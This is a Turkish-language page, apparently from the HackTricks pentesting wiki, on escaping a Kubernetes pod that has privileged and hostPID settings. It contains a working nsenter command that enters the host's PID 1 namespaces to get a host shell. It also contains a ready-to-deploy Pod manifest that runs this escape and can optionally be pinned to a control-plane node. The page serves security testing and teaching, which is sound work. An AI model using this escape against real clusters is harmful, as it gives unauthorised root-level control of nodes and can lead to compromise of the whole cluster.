Skip to content

Latest commit

 

History

History
59 lines (47 loc) · 3.4 KB

File metadata and controls

59 lines (47 loc) · 3.4 KB

Pod Kaçış Yetkileri

{% hint style="success" %} AWS Hacking öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'ı Destekleyin
{% endhint %}

Ayrıcalıklı ve hostPID

Bu yetkilerle ana bilgisayarın işlemlerine erişebileceksiniz ve ana bilgisayar işlemlerinden birinin ad alanına girmek için yeterli ayrıcalıklara sahip olacaksınız.
Unutmayın ki ayrıcalıklı olmanıza gerek olmayabilir, sadece bazı yeteneklere ve diğer potansiyel savunma mekanizmalarını atlatmaya ihtiyacınız olabilir (örneğin apparmor ve/veya seccomp).

Sadece aşağıdakine benzer bir şeyi çalıştırmak, pod'dan kaçmanıza izin verecektir:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Yapılandırma örneği:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

{% hint style="success" %} AWS Hacking'i öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin
{% endhint %}